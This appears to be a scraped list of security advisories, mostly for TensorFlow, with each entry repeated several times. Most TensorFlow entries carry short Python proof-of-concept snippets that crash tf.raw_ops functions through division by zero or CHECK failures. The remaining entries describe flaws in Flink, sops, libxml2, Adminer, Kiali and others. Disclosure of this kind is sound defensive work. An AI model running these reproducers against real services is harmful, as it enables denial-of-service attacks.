An attacker can cause a denial of service via a FPE runtime error in tf.raw_ops.FusedBatchNorm: import tensorflow as tf x = tf.constant([], shape=[1, 1, 1, 0], dtype=tf.float32) scale = tf.constant([], shape=[0], dtype=tf.float32) offset = tf.constant([], shape=[0], dtype=tf.float32) mean = tf.constant([], shape=[0], dtype=tf.float32) variance = tf.constant([], shape=[0], dtype=tf.float32) epsilon = 0.0 exponential_avg_factor = 0.0 data_format = "NHWC" is_training = False tf.raw_ops.FusedBatchNorm( x=x, scale=scale, offset=offset, mean=mean, variance=variance, epsilon=epsilon, exponential_avg_factor=exponential_avg_factor, data_format=data_format, is_training=is_training)

Division by 0 in `FractionalAvgPool`

An attacker can cause a runtime division by zero error and denial of service in tf.raw_ops.FractionalAvgPool: import tensorflow as tf value = tf.constant([60], shape=[1, 1, 1, 1], dtype=tf.int32) pooling_ratio = [1.0, 1.0000014345305555, 1.0, 1.0] pseudo_random = False overlapping = False deterministic = False seed = 0 seed2 = 0 tf.raw_ops.FractionalAvgPool( value=value, pooling_ratio=pooling_ratio, pseudo_random=pseudo_random, overlapping=overlapping, deterministic=deterministic, seed=seed, seed2=seed2)

Division by 0 in `FractionalAvgPool`

An attacker can cause a runtime division by zero error and denial of service in tf.raw_ops.FractionalAvgPool: import tensorflow as tf value = tf.constant([60], shape=[1, 1, 1, 1], dtype=tf.int32) pooling_ratio = [1.0, 1.0000014345305555, 1.0, 1.0] pseudo_random = False overlapping = False deterministic = False seed = 0 seed2 = 0 tf.raw_ops.FractionalAvgPool( value=value, pooling_ratio=pooling_ratio, pseudo_random=pseudo_random, overlapping=overlapping, deterministic=deterministic, seed=seed, seed2=seed2)

Division by 0 in `FractionalAvgPool`

An attacker can cause a runtime division by zero error and denial of service in tf.raw_ops.FractionalAvgPool: import tensorflow as tf value = tf.constant([60], shape=[1, 1, 1, 1], dtype=tf.int32) pooling_ratio = [1.0, 1.0000014345305555, 1.0, 1.0] pseudo_random = False overlapping = False deterministic = False seed = 0 seed2 = 0 tf.raw_ops.FractionalAvgPool( value=value, pooling_ratio=pooling_ratio, pseudo_random=pseudo_random, overlapping=overlapping, deterministic=deterministic, seed=seed, seed2=seed2)

Division by 0 in `DenseCountSparseOutput`

An attacker can cause a denial of service via a FPE runtime error in tf.raw_ops.DenseCountSparseOutput: import tensorflow as tf values = tf.constant([], shape=[0, 0], dtype=tf.int64) weights = tf.constant([]) tf.raw_ops.DenseCountSparseOutput( values=values, weights=weights, minlength=-1, maxlength=58, binary_output=True)

Division by 0 in `DenseCountSparseOutput`

An attacker can cause a denial of service via a FPE runtime error in tf.raw_ops.DenseCountSparseOutput: import tensorflow as tf values = tf.constant([], shape=[0, 0], dtype=tf.int64) weights = tf.constant([]) tf.raw_ops.DenseCountSparseOutput( values=values, weights=weights, minlength=-1, maxlength=58, binary_output=True)

Division by 0 in `DenseCountSparseOutput`

An attacker can cause a denial of service via a FPE runtime error in tf.raw_ops.DenseCountSparseOutput: import tensorflow as tf values = tf.constant([], shape=[0, 0], dtype=tf.int64) weights = tf.constant([]) tf.raw_ops.DenseCountSparseOutput( values=values, weights=weights, minlength=-1, maxlength=58, binary_output=True)

Division by 0 in `Conv3DBackprop*`

The tf.raw_ops.Conv3DBackprop* operations fail to validate that the input tensors are not empty. In turn, this would result in a division by 0: import tensorflow as tf input_sizes = tf.constant([0, 0, 0, 0, 0], shape=[5], dtype=tf.int32) filter_tensor = tf.constant([], shape=[0, 0, 0, 1, 0], dtype=tf.float32) out_backprop = tf.constant([], shape=[0, 0, 0, 0, 0], dtype=tf.float32) tf.raw_ops.Conv3DBackpropInputV2(input_sizes=input_sizes, filter=filter_tensor, out_backprop=out_backprop, strides=[1, 1, 1, 1, 1], padding='SAME', data_format='NDHWC', dilations=[1, 1, 1, 1, 1]) import …

Division by 0 in `Conv3DBackprop*`

The tf.raw_ops.Conv3DBackprop* operations fail to validate that the input tensors are not empty. In turn, this would result in a division by 0: import tensorflow as tf input_sizes = tf.constant([0, 0, 0, 0, 0], shape=[5], dtype=tf.int32) filter_tensor = tf.constant([], shape=[0, 0, 0, 1, 0], dtype=tf.float32) out_backprop = tf.constant([], shape=[0, 0, 0, 0, 0], dtype=tf.float32) tf.raw_ops.Conv3DBackpropInputV2(input_sizes=input_sizes, filter=filter_tensor, out_backprop=out_backprop, strides=[1, 1, 1, 1, 1], padding='SAME', data_format='NDHWC', dilations=[1, 1, 1, 1, 1]) import …

Division by 0 in `Conv3DBackprop*`

The tf.raw_ops.Conv3DBackprop* operations fail to validate that the input tensors are not empty. In turn, this would result in a division by 0: import tensorflow as tf input_sizes = tf.constant([0, 0, 0, 0, 0], shape=[5], dtype=tf.int32) filter_tensor = tf.constant([], shape=[0, 0, 0, 1, 0], dtype=tf.float32) out_backprop = tf.constant([], shape=[0, 0, 0, 0, 0], dtype=tf.float32) tf.raw_ops.Conv3DBackpropInputV2(input_sizes=input_sizes, filter=filter_tensor, out_backprop=out_backprop, strides=[1, 1, 1, 1, 1], padding='SAME', data_format='NDHWC', dilations=[1, 1, 1, 1, 1]) import …

Division by 0 in `Conv2DBackpropInput`

An attacker can trigger a division by 0 in tf.raw_ops.Conv2DBackpropInput: import tensorflow as tf input_tensor = tf.constant([52, 1, 1, 5], shape=[4], dtype=tf.int32) filter_tensor = tf.constant([], shape=[0, 1, 5, 0], dtype=tf.float32) out_backprop = tf.constant([], shape=[52, 1, 1, 0], dtype=tf.float32) tf.raw_ops.Conv2DBackpropInput(input_sizes=input_tensor, filter=filter_tensor, out_backprop=out_backprop, strides=[1, 1, 1, 1], use_cudnn_on_gpu=True, padding='SAME', explicit_paddings=[], data_format='NHWC', dilations=[1, 1, 1, 1])

Division by 0 in `Conv2DBackpropInput`

An attacker can trigger a division by 0 in tf.raw_ops.Conv2DBackpropInput: import tensorflow as tf input_tensor = tf.constant([52, 1, 1, 5], shape=[4], dtype=tf.int32) filter_tensor = tf.constant([], shape=[0, 1, 5, 0], dtype=tf.float32) out_backprop = tf.constant([], shape=[52, 1, 1, 0], dtype=tf.float32) tf.raw_ops.Conv2DBackpropInput(input_sizes=input_tensor, filter=filter_tensor, out_backprop=out_backprop, strides=[1, 1, 1, 1], use_cudnn_on_gpu=True, padding='SAME', explicit_paddings=[], data_format='NHWC', dilations=[1, 1, 1, 1])

Division by 0 in `Conv2DBackpropInput`

An attacker can trigger a division by 0 in tf.raw_ops.Conv2DBackpropInput: import tensorflow as tf input_tensor = tf.constant([52, 1, 1, 5], shape=[4], dtype=tf.int32) filter_tensor = tf.constant([], shape=[0, 1, 5, 0], dtype=tf.float32) out_backprop = tf.constant([], shape=[52, 1, 1, 0], dtype=tf.float32) tf.raw_ops.Conv2DBackpropInput(input_sizes=input_tensor, filter=filter_tensor, out_backprop=out_backprop, strides=[1, 1, 1, 1], use_cudnn_on_gpu=True, padding='SAME', explicit_paddings=[], data_format='NHWC', dilations=[1, 1, 1, 1])

Division by 0 in `Conv2DBackpropFilter`

An attacker can trigger a division by 0 in tf.raw_ops.Conv2DBackpropFilter: import tensorflow as tf input_tensor = tf.constant([], shape=[0, 0, 1, 0], dtype=tf.float32) filter_sizes = tf.constant([1, 1, 1, 1], shape=[4], dtype=tf.int32) out_backprop = tf.constant([], shape=[0, 0, 1, 1], dtype=tf.float32) tf.raw_ops.Conv2DBackpropFilter(input=input_tensor, filter_sizes=filter_sizes, out_backprop=out_backprop, strides=[1, 66, 18, 1], use_cudnn_on_gpu=True, padding='SAME', explicit_paddings=[], data_format='NHWC', dilations=[1, 1, 1, 1])

Division by 0 in `Conv2DBackpropFilter`

An attacker can trigger a division by 0 in tf.raw_ops.Conv2DBackpropFilter: import tensorflow as tf input_tensor = tf.constant([], shape=[0, 0, 1, 0], dtype=tf.float32) filter_sizes = tf.constant([1, 1, 1, 1], shape=[4], dtype=tf.int32) out_backprop = tf.constant([], shape=[0, 0, 1, 1], dtype=tf.float32) tf.raw_ops.Conv2DBackpropFilter(input=input_tensor, filter_sizes=filter_sizes, out_backprop=out_backprop, strides=[1, 66, 18, 1], use_cudnn_on_gpu=True, padding='SAME', explicit_paddings=[], data_format='NHWC', dilations=[1, 1, 1, 1])

Division by 0 in `Conv2DBackpropFilter`

An attacker can trigger a division by 0 in tf.raw_ops.Conv2DBackpropFilter: import tensorflow as tf input_tensor = tf.constant([], shape=[0, 0, 1, 0], dtype=tf.float32) filter_sizes = tf.constant([1, 1, 1, 1], shape=[4], dtype=tf.int32) out_backprop = tf.constant([], shape=[0, 0, 1, 1], dtype=tf.float32) tf.raw_ops.Conv2DBackpropFilter(input=input_tensor, filter_sizes=filter_sizes, out_backprop=out_backprop, strides=[1, 66, 18, 1], use_cudnn_on_gpu=True, padding='SAME', explicit_paddings=[], data_format='NHWC', dilations=[1, 1, 1, 1])

Division by 0 in `Conv2D`

An attacker can trigger a division by 0 in tf.raw_ops.Conv2D: import tensorflow as tf input = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.float32) filter = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.float32) strides = [1, 1, 1, 1] padding = "SAME" tf.raw_ops.Conv2D(input=input, filter=filter, strides=strides, padding=padding)

Division by 0 in `Conv2D`

An attacker can trigger a division by 0 in tf.raw_ops.Conv2D: import tensorflow as tf input = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.float32) filter = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.float32) strides = [1, 1, 1, 1] padding = "SAME" tf.raw_ops.Conv2D(input=input, filter=filter, strides=strides, padding=padding)

Division by 0 in `Conv2D`

An attacker can trigger a division by 0 in tf.raw_ops.Conv2D: import tensorflow as tf input = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.float32) filter = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.float32) strides = [1, 1, 1, 1] padding = "SAME" tf.raw_ops.Conv2D(input=input, filter=filter, strides=strides, padding=padding)

Divide By Zero

TensorFlow is an end-to-end open source platform for machine learning. The TFLite implementation of hashtable lookup is vulnerable to a division by zero error An attacker can craft a model such that values's first dimension would be 0. The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in …

Divide By Zero

TensorFlow is an end-to-end open source platform for machine learning. An attacker can cause a denial of service via a FPE runtime error in tf.raw_ops.SparseMatMul. The division by 0 occurs deep in Eigen code because the b tensor is empty. The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and …

Command injection in Apache Flink

A vulnerability in Apache Flink (1.1.0 to 1.1.5, 1.2.0 to 1.2.1, 1.3.0 to 1.3.3, 1.4.0 to 1.4.2, 1.5.0 to 1.5.6, 1.6.0 to 1.6.4, 1.7.0 to 1.7.2, 1.8.0 to 1.8.3, 1.9.0 to 1.9.2, 1.10.0) where, when running a process with an enabled JMXReporter, with a port configured via metrics.reporter.reporter_name>.port, an attacker with local access to the machine and JMX port can execute a man-in-the-middle attack using a specially crafted request to …

CHECK-failure in `UnsortedSegmentJoin`

An attacker can cause a denial of service by controlling the values of num_segments tensor argument for UnsortedSegmentJoin: import tensorflow as tf inputs = tf.constant([], dtype=tf.string) segment_ids = tf.constant([], dtype=tf.int32) num_segments = tf.constant([], dtype=tf.int32) separator = '' tf.raw_ops.UnsortedSegmentJoin( inputs=inputs, segment_ids=segment_ids, num_segments=num_segments, separator=separator)

CHECK-failure in `UnsortedSegmentJoin`

An attacker can cause a denial of service by controlling the values of num_segments tensor argument for UnsortedSegmentJoin: import tensorflow as tf inputs = tf.constant([], dtype=tf.string) segment_ids = tf.constant([], dtype=tf.int32) num_segments = tf.constant([], dtype=tf.int32) separator = '' tf.raw_ops.UnsortedSegmentJoin( inputs=inputs, segment_ids=segment_ids, num_segments=num_segments, separator=separator)

CHECK-failure in `UnsortedSegmentJoin`

An attacker can cause a denial of service by controlling the values of num_segments tensor argument for UnsortedSegmentJoin: import tensorflow as tf inputs = tf.constant([], dtype=tf.string) segment_ids = tf.constant([], dtype=tf.int32) num_segments = tf.constant([], dtype=tf.int32) separator = '' tf.raw_ops.UnsortedSegmentJoin( inputs=inputs, segment_ids=segment_ids, num_segments=num_segments, separator=separator)

CHECK-fail in tf.raw_ops.EncodePng

An attacker can trigger a CHECK fail in PNG encoding by providing an empty input tensor as the pixel data: import tensorflow as tf image = tf.zeros([0, 0, 3]) image = tf.cast(image, dtype=tf.uint8) tf.raw_ops.EncodePng(image=image)

CHECK-fail in tf.raw_ops.EncodePng

An attacker can trigger a CHECK fail in PNG encoding by providing an empty input tensor as the pixel data: import tensorflow as tf image = tf.zeros([0, 0, 3]) image = tf.cast(image, dtype=tf.uint8) tf.raw_ops.EncodePng(image=image)

CHECK-fail in tf.raw_ops.EncodePng

An attacker can trigger a CHECK fail in PNG encoding by providing an empty input tensor as the pixel data: import tensorflow as tf image = tf.zeros([0, 0, 3]) image = tf.cast(image, dtype=tf.uint8) tf.raw_ops.EncodePng(image=image)

CHECK-fail in SparseCross due to type confusion

The API of tf.raw_ops.SparseCross allows combinations which would result in a CHECK-failure and denial of service: import tensorflow as tf hashed_output = False num_buckets = 1949315406 hash_key = 1869835877 out_type = tf.string internal_type = tf.string indices_1 = tf.constant([0, 6], shape=[1, 2], dtype=tf.int64) indices_2 = tf.constant([0, 0], shape=[1, 2], dtype=tf.int64) indices = [indices_1, indices_2] values_1 = tf.constant([0], dtype=tf.int64) values_2 = tf.constant([72], dtype=tf.int64) values = [values_1, values_2] batch_size = 4 shape_1 = …

CHECK-fail in SparseCross due to type confusion

The API of tf.raw_ops.SparseCross allows combinations which would result in a CHECK-failure and denial of service: import tensorflow as tf hashed_output = False num_buckets = 1949315406 hash_key = 1869835877 out_type = tf.string internal_type = tf.string indices_1 = tf.constant([0, 6], shape=[1, 2], dtype=tf.int64) indices_2 = tf.constant([0, 0], shape=[1, 2], dtype=tf.int64) indices = [indices_1, indices_2] values_1 = tf.constant([0], dtype=tf.int64) values_2 = tf.constant([72], dtype=tf.int64) values = [values_1, values_2] batch_size = 4 shape_1 = …

CHECK-fail in SparseCross due to type confusion

The API of tf.raw_ops.SparseCross allows combinations which would result in a CHECK-failure and denial of service: import tensorflow as tf hashed_output = False num_buckets = 1949315406 hash_key = 1869835877 out_type = tf.string internal_type = tf.string indices_1 = tf.constant([0, 6], shape=[1, 2], dtype=tf.int64) indices_2 = tf.constant([0, 0], shape=[1, 2], dtype=tf.int64) indices = [indices_1, indices_2] values_1 = tf.constant([0], dtype=tf.int64) values_2 = tf.constant([72], dtype=tf.int64) values = [values_1, values_2] batch_size = 4 shape_1 = …

CHECK-fail in SparseConcat

An attacker can trigger a denial of service via a CHECK-fail in tf.raw_ops.SparseConcat: import tensorflow as tf import numpy as np indices_1 = tf.constant([[514, 514], [514, 514]], dtype=tf.int64) indices_2 = tf.constant([[514, 530], [599, 877]], dtype=tf.int64) indices = [indices_1, indices_2] values_1 = tf.zeros([0], dtype=tf.int64) values_2 = tf.zeros([0], dtype=tf.int64) values = [values_1, values_2] shape_1 = tf.constant([442, 514, 514, 515, 606, 347, 943, 61, 2], dtype=tf.int64) shape_2 = tf.zeros([9], dtype=tf.int64) shapes = [shape_1, …

CHECK-fail in SparseConcat

An attacker can trigger a denial of service via a CHECK-fail in tf.raw_ops.SparseConcat: import tensorflow as tf import numpy as np indices_1 = tf.constant([[514, 514], [514, 514]], dtype=tf.int64) indices_2 = tf.constant([[514, 530], [599, 877]], dtype=tf.int64) indices = [indices_1, indices_2] values_1 = tf.zeros([0], dtype=tf.int64) values_2 = tf.zeros([0], dtype=tf.int64) values = [values_1, values_2] shape_1 = tf.constant([442, 514, 514, 515, 606, 347, 943, 61, 2], dtype=tf.int64) shape_2 = tf.zeros([9], dtype=tf.int64) shapes = [shape_1, …

CHECK-fail in SparseConcat

An attacker can trigger a denial of service via a CHECK-fail in tf.raw_ops.SparseConcat: import tensorflow as tf import numpy as np indices_1 = tf.constant([[514, 514], [514, 514]], dtype=tf.int64) indices_2 = tf.constant([[514, 530], [599, 877]], dtype=tf.int64) indices = [indices_1, indices_2] values_1 = tf.zeros([0], dtype=tf.int64) values_2 = tf.zeros([0], dtype=tf.int64) values = [values_1, values_2] shape_1 = tf.constant([442, 514, 514, 515, 606, 347, 943, 61, 2], dtype=tf.int64) shape_2 = tf.zeros([9], dtype=tf.int64) shapes = [shape_1, …

CHECK-fail in DrawBoundingBoxes

An attacker can trigger a denial of service via a CHECK failure by passing an empty image to tf.raw_ops.DrawBoundingBoxes: import tensorflow as tf images = tf.fill([53, 0, 48, 1], 0.) boxes = tf.fill([53, 31, 4], 0.) boxes = tf.Variable(boxes) boxes[0, 0, 0].assign(3.90621) tf.raw_ops.DrawBoundingBoxes(images=images, boxes=boxes)

CHECK-fail in DrawBoundingBoxes

An attacker can trigger a denial of service via a CHECK failure by passing an empty image to tf.raw_ops.DrawBoundingBoxes: import tensorflow as tf images = tf.fill([53, 0, 48, 1], 0.) boxes = tf.fill([53, 31, 4], 0.) boxes = tf.Variable(boxes) boxes[0, 0, 0].assign(3.90621) tf.raw_ops.DrawBoundingBoxes(images=images, boxes=boxes)

CHECK-fail in DrawBoundingBoxes

An attacker can trigger a denial of service via a CHECK failure by passing an empty image to tf.raw_ops.DrawBoundingBoxes: import tensorflow as tf images = tf.fill([53, 0, 48, 1], 0.) boxes = tf.fill([53, 31, 4], 0.) boxes = tf.Variable(boxes) boxes[0, 0, 0].assign(3.90621) tf.raw_ops.DrawBoundingBoxes(images=images, boxes=boxes)

CHECK-fail in AddManySparseToTensorsMap

An attacker can trigger a denial of service via a CHECK-fail in tf.raw_ops.AddManySparseToTensorsMap: import tensorflow as tf import numpy as np sparse_indices = tf.constant(530, shape=[1, 1], dtype=tf.int64) sparse_values = tf.ones([1], dtype=tf.int64) shape = tf.Variable(tf.ones([55], dtype=tf.int64)) shape[:8].assign(np.array([855, 901, 429, 892, 892, 852, 93, 96], dtype=np.int64)) tf.raw_ops.AddManySparseToTensorsMap(sparse_indices=sparse_indices, sparse_values=sparse_values, sparse_shape=shape)

CHECK-fail in AddManySparseToTensorsMap

An attacker can trigger a denial of service via a CHECK-fail in tf.raw_ops.AddManySparseToTensorsMap: import tensorflow as tf import numpy as np sparse_indices = tf.constant(530, shape=[1, 1], dtype=tf.int64) sparse_values = tf.ones([1], dtype=tf.int64) shape = tf.Variable(tf.ones([55], dtype=tf.int64)) shape[:8].assign(np.array([855, 901, 429, 892, 892, 852, 93, 96], dtype=np.int64)) tf.raw_ops.AddManySparseToTensorsMap(sparse_indices=sparse_indices, sparse_values=sparse_values, sparse_shape=shape)

CHECK-fail in AddManySparseToTensorsMap

An attacker can trigger a denial of service via a CHECK-fail in tf.raw_ops.AddManySparseToTensorsMap: import tensorflow as tf import numpy as np sparse_indices = tf.constant(530, shape=[1, 1], dtype=tf.int64) sparse_values = tf.ones([1], dtype=tf.int64) shape = tf.Variable(tf.ones([55], dtype=tf.int64)) shape[:8].assign(np.array([855, 901, 429, 892, 892, 852, 93, 96], dtype=np.int64)) tf.raw_ops.AddManySparseToTensorsMap(sparse_indices=sparse_indices, sparse_values=sparse_values, sparse_shape=shape)

CHECK-fail in `tf.raw_ops.RFFT`

An attacker can cause a denial of service by exploiting a CHECK-failure coming from the implementation of tf.raw_ops.RFFT: import tensorflow as tf inputs = tf.constant([1], shape=[1], dtype=tf.float32) fft_length = tf.constant([0], shape=[1], dtype=tf.int32) tf.raw_ops.RFFT(input=inputs, fft_length=fft_length) The above example causes Eigen code to operate on an empty matrix. This triggers on an assertion and causes program termination.

CHECK-fail in `tf.raw_ops.RFFT`

An attacker can cause a denial of service by exploiting a CHECK-failure coming from the implementation of tf.raw_ops.RFFT: import tensorflow as tf inputs = tf.constant([1], shape=[1], dtype=tf.float32) fft_length = tf.constant([0], shape=[1], dtype=tf.int32) tf.raw_ops.RFFT(input=inputs, fft_length=fft_length) The above example causes Eigen code to operate on an empty matrix. This triggers on an assertion and causes program termination.

CHECK-fail in `tf.raw_ops.RFFT`

An attacker can cause a denial of service by exploiting a CHECK-failure coming from the implementation of tf.raw_ops.RFFT: import tensorflow as tf inputs = tf.constant([1], shape=[1], dtype=tf.float32) fft_length = tf.constant([0], shape=[1], dtype=tf.int32) tf.raw_ops.RFFT(input=inputs, fft_length=fft_length) The above example causes Eigen code to operate on an empty matrix. This triggers on an assertion and causes program termination.

CHECK-fail in `tf.raw_ops.IRFFT`

An attacker can cause a denial of service by exploiting a CHECK-failure coming from the implementation of tf.raw_ops.IRFFT: import tensorflow as tf values = [-10.0] * 130 values[0] = -9.999999999999995 inputs = tf.constant(values, shape=[10, 13], dtype=tf.float32) inputs = tf.cast(inputs, dtype=tf.complex64) fft_length = tf.constant([0], shape=[1], dtype=tf.int32) tf.raw_ops.IRFFT(input=inputs, fft_length=fft_length) The above example causes Eigen code to operate on an empty matrix. This triggers on an assertion and causes program termination.

CHECK-fail in `tf.raw_ops.IRFFT`

An attacker can cause a denial of service by exploiting a CHECK-failure coming from the implementation of tf.raw_ops.IRFFT: import tensorflow as tf values = [-10.0] * 130 values[0] = -9.999999999999995 inputs = tf.constant(values, shape=[10, 13], dtype=tf.float32) inputs = tf.cast(inputs, dtype=tf.complex64) fft_length = tf.constant([0], shape=[1], dtype=tf.int32) tf.raw_ops.IRFFT(input=inputs, fft_length=fft_length) The above example causes Eigen code to operate on an empty matrix. This triggers on an assertion and causes program termination.

CHECK-fail in `tf.raw_ops.IRFFT`

An attacker can cause a denial of service by exploiting a CHECK-failure coming from the implementation of tf.raw_ops.IRFFT: import tensorflow as tf values = [-10.0] * 130 values[0] = -9.999999999999995 inputs = tf.constant(values, shape=[10, 13], dtype=tf.float32) inputs = tf.cast(inputs, dtype=tf.complex64) fft_length = tf.constant([0], shape=[1], dtype=tf.int32) tf.raw_ops.IRFFT(input=inputs, fft_length=fft_length) The above example causes Eigen code to operate on an empty matrix. This triggers on an assertion and causes program termination.

CHECK-fail in `QuantizeAndDequantizeV4Grad`

An attacker can trigger a denial of service via a CHECK-fail in tf.raw_ops.QuantizeAndDequantizeV4Grad: import tensorflow as tf gradient_tensor = tf.constant([0.0], shape=[1]) input_tensor = tf.constant([0.0], shape=[1]) input_min = tf.constant([[0.0]], shape=[1, 1]) input_max = tf.constant([[0.0]], shape=[1, 1]) tf.raw_ops.QuantizeAndDequantizeV4Grad( gradients=gradient_tensor, input=input_tensor, input_min=input_min, input_max=input_max, axis=0)

CHECK-fail in `QuantizeAndDequantizeV4Grad`

An attacker can trigger a denial of service via a CHECK-fail in tf.raw_ops.QuantizeAndDequantizeV4Grad: import tensorflow as tf gradient_tensor = tf.constant([0.0], shape=[1]) input_tensor = tf.constant([0.0], shape=[1]) input_min = tf.constant([[0.0]], shape=[1, 1]) input_max = tf.constant([[0.0]], shape=[1, 1]) tf.raw_ops.QuantizeAndDequantizeV4Grad( gradients=gradient_tensor, input=input_tensor, input_min=input_min, input_max=input_max, axis=0)

CHECK-fail in `LoadAndRemapMatrix`

An attacker can cause a denial of service by exploiting a CHECK-failure coming from tf.raw_ops.LoadAndRemapMatrix: import tensorflow as tf ckpt_path = tf.constant([], shape=[0], dtype=tf.string) old_tensor_name = tf.constant("") row_remapping = tf.constant([], shape=[0], dtype=tf.int64) col_remapping = tf.constant([1], shape=[1], dtype=tf.int64) initializing_values = tf.constant(1.0) tf.raw_ops.LoadAndRemapMatrix( ckpt_path=ckpt_path, old_tensor_name=old_tensor_name, row_remapping=row_remapping, col_remapping=col_remapping, initializing_values=initializing_values, num_rows=0, num_cols=1)

CHECK-fail in `LoadAndRemapMatrix`

An attacker can cause a denial of service by exploiting a CHECK-failure coming from tf.raw_ops.LoadAndRemapMatrix: import tensorflow as tf ckpt_path = tf.constant([], shape=[0], dtype=tf.string) old_tensor_name = tf.constant("") row_remapping = tf.constant([], shape=[0], dtype=tf.int64) col_remapping = tf.constant([1], shape=[1], dtype=tf.int64) initializing_values = tf.constant(1.0) tf.raw_ops.LoadAndRemapMatrix( ckpt_path=ckpt_path, old_tensor_name=old_tensor_name, row_remapping=row_remapping, col_remapping=col_remapping, initializing_values=initializing_values, num_rows=0, num_cols=1)

CHECK-fail in `LoadAndRemapMatrix`

An attacker can cause a denial of service by exploiting a CHECK-failure coming from tf.raw_ops.LoadAndRemapMatrix: import tensorflow as tf ckpt_path = tf.constant([], shape=[0], dtype=tf.string) old_tensor_name = tf.constant("") row_remapping = tf.constant([], shape=[0], dtype=tf.int64) col_remapping = tf.constant([1], shape=[1], dtype=tf.int64) initializing_values = tf.constant(1.0) tf.raw_ops.LoadAndRemapMatrix( ckpt_path=ckpt_path, old_tensor_name=old_tensor_name, row_remapping=row_remapping, col_remapping=col_remapping, initializing_values=initializing_values, num_rows=0, num_cols=1)

CHECK-fail in `CTCGreedyDecoder`

An attacker can trigger a denial of service via a CHECK-fail in tf.raw_ops.CTCGreedyDecoder: import tensorflow as tf inputs = tf.constant([], shape=[18, 2, 0], dtype=tf.float32) sequence_length = tf.constant([-100, 17], shape=[2], dtype=tf.int32) merge_repeated = False tf.raw_ops.CTCGreedyDecoder(inputs=inputs, sequence_length=sequence_length, merge_repeated=merge_repeated)

CHECK-fail in `CTCGreedyDecoder`

An attacker can trigger a denial of service via a CHECK-fail in tf.raw_ops.CTCGreedyDecoder: import tensorflow as tf inputs = tf.constant([], shape=[18, 2, 0], dtype=tf.float32) sequence_length = tf.constant([-100, 17], shape=[2], dtype=tf.int32) merge_repeated = False tf.raw_ops.CTCGreedyDecoder(inputs=inputs, sequence_length=sequence_length, merge_repeated=merge_repeated)

CHECK-fail in `CTCGreedyDecoder`

An attacker can trigger a denial of service via a CHECK-fail in tf.raw_ops.CTCGreedyDecoder: import tensorflow as tf inputs = tf.constant([], shape=[18, 2, 0], dtype=tf.float32) sequence_length = tf.constant([-100, 17], shape=[2], dtype=tf.int32) merge_repeated = False tf.raw_ops.CTCGreedyDecoder(inputs=inputs, sequence_length=sequence_length, merge_repeated=merge_repeated)

CHECK-fail due to integer overflow

An attacker can trigger a denial of service via a CHECK-fail in caused by an integer overflow in constructing a new tensor shape: import tensorflow as tf input_layer = 2**60-1 sparse_data = tf.raw_ops.SparseSplit( split_dim=1, indices=[(0, 0), (0, 1), (0, 2), (4, 3), (5, 0), (5, 1)], values=[1.0, 1.0, 1.0, 1.0, 1.0, 1.0], shape=(input_layer, input_layer), num_split=2, name=None )

CHECK-fail due to integer overflow

An attacker can trigger a denial of service via a CHECK-fail in caused by an integer overflow in constructing a new tensor shape: import tensorflow as tf input_layer = 2**60-1 sparse_data = tf.raw_ops.SparseSplit( split_dim=1, indices=[(0, 0), (0, 1), (0, 2), (4, 3), (5, 0), (5, 1)], values=[1.0, 1.0, 1.0, 1.0, 1.0, 1.0], shape=(input_layer, input_layer), num_split=2, name=None )

CHECK-fail due to integer overflow

An attacker can trigger a denial of service via a CHECK-fail in caused by an integer overflow in constructing a new tensor shape: import tensorflow as tf input_layer = 2**60-1 sparse_data = tf.raw_ops.SparseSplit( split_dim=1, indices=[(0, 0), (0, 1), (0, 2), (4, 3), (5, 0), (5, 1)], values=[1.0, 1.0, 1.0, 1.0, 1.0, 1.0], shape=(input_layer, input_layer), num_split=2, name=None )

A failed upgrade may lead to hung goroutines

Impact Processes using tableflip may encounter hung goroutines in the parent process, after a failed upgrade. The Go runtime has annoying behaviour around setting and clearing O_NONBLOCK: exec.Cmd.Start() ends up calling os.File.Fd() for any file in exec.Cmd.ExtraFiles. os.File.Fd() disables both the use of the runtime poller for the file and clears O_NONBLOCK from the underlying open file descriptor. This can lead to goroutines hanging in a parent process, after at …

Local directory executable lookup in sops (Windows-only)

Impact Windows users using the sops direct editor option (sops file.yaml) can have a local executable named either vi, vim, or nano executed if running sops from cmd.exe This attack is only viable if an attacker is able to place a malicious binary within the directory you are running sops from. As well, this attack will only work when using cmd.exe or the Windows C library SearchPath function. This is …

Information Exposure

This affects the package dns-packet It creates buffers with allocUnsafe and does not always fill them before forming network packets. This can expose internal application memory over unencrypted network when querying crafted invalid domain names.

Out-of-bounds Write

There is a flaw in the xml entity encoding functionality of libxml2 The most likely impact of this flaw is to application availability, with some potential impact to confidentiality and integrity if an attacker is able to use memory information to further exploit the application.

Out-of-bounds Write

There is a flaw in the xml entity encoding functionality of libxml2 The most likely impact of this flaw is to application availability, with some potential impact to confidentiality and integrity if an attacker is able to use memory information to further exploit the application.

Out-of-bounds Write

There is a flaw in the xml entity encoding functionality of libxml2 The most likely impact of this flaw is to application availability, with some potential impact to confidentiality and integrity if an attacker is able to use memory information to further exploit the application.

Denial of service due to improper input validation in third-party identifier endpoint

Impact Missing input validation of some parameters on the endpoints used to confirm third-party identifiers could cause excessive use of disk space and memory leading to resource exhaustion. Patches The issue is fixed by https://github.com/matrix-org/synapse/pull/9855. Workarounds There are no known workarounds. References n/a For more information If you have any questions or comments about this advisory, email us at security@matrix.org.

Cross-site Scripting

Adminer is open-source database management software. A cross-site scripting vulnerability in Adminer to affects users of MySQL, MariaDB, PgSQL and SQLite. XSS is in most cases prevented by strict CSP in all modern browsers. The only exception is when Adminer is using a pdo_ extension to communicate with the database (it is used if the native extensions are not enabled). In browsers without CSP, Adminer to are affected. As a …

Use of Hard-coded Credentials

A hard-coded cryptographic key vulnerability in the default configuration file was found in Kiali, all versions prior to 1.15.1. A remote attacker could abuse this flaw by creating their own JWT signed tokens and bypass Kiali authentication mechanisms, possibly gaining privileges to view and alter the Istio configuration.

Use of Hard-coded Credentials

